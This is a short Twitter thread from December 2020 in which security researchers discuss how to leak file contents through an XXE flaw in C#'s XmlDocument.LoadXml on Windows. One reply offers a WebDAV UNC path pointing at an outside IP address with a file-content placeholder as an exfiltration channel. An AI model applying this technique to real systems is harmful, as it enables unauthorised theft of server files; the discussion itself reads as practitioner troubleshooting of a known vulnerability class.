Anyone have a way to leak file contents via XXE when using System.Xml.XmlDocument.LoadXml in C#? I can only get DNS out, I have verbose errors being returned. It's a Windows system, I have been successful using a local DTD file, but cannot get the error to leak file contents.
-
Show this thread
-
-
Replying to @jonasLyk
It would have to be one line, otherwise the error I receive is: Error parsing request: System.UriFormatException: Invalid URI: The hostname could not be parsed.
1 reply 0 retweets 0 likes
Replying to @infosec_au
have you tried webdav on the dns port \\192.33.22.11@21\davwwwroot\#FILECONTENT#
9:28 PM - 23 Dec 2020
0 replies
0 retweets
6 likes
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.